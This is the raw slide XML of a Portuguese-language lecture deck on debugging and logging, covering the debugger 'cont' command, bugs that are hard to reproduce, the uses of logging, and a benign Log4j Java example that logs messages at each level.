            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Google Shape;378;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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p6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6. Continuar com a execu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ção</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Google Shape;384;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>cont: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>continua execução após breakpoint, exceção ou step</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Google Shape;390;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1685875"/>
            <a:ext cx="8668800" cy="6093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b="1" lang="en" sz="3600"/>
              <a:t>Logging</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Google Shape;391;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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Problema: certos bugs s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ão difíceis de reproduzir</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1228675"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Bugs em programas concorrentes</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Bugs devido a um hardware com defeito intermitente</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Bugs que dependem das condições da rede</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Bugs que dependem de datas e horários</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Bugs devido a alocação incorreta de memória</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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 name="Shape 395"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p6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Logging</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Google Shape;397;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1076275"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Registrar informações sobre a execução de um sistema</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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2" name="Shape 402"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Google Shape;403;p6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Usos de Logging</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1076275"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Depuração </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>(principalmente quando bug ocorreu em uma máquina remota; logo, pode não ser simples reproduzir em sua máquina local)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Auditoria</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Análise de desempenho </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>(ex.: descobrir gargalos de execução)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Estatísticas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>(ex.: páginas mais acessadas em servidor web)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Alertas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>(ex.: componentes com muitas falhas)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Google Shape;405;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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9" name="Shape 409"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Google Shape;410;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1402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Log4j: biblioteca de logging para Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>(desde 2001)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Google Shape;411;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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12" name="Google Shape;412;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="990600"/>
            <a:ext cx="8263200" cy="36327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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> org.apache.logging.log4j.LogManager;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> org.apache.logging.log4j.Logger;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>public class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> Log4jExample {</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  // Create a Logger instance</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>private static final</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> Logger logger = LogManager.getLogger();</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>public static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> void main(String[] args) {</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    logger.trace("This is a trace message.");</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.debug("This is a debug message.");</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    logger.info("This is an info message.");</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    logger.warn("This is a warning message.");</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    logger.error("This is an error message.");</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    logger.fatal("This is a fatal message.");</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
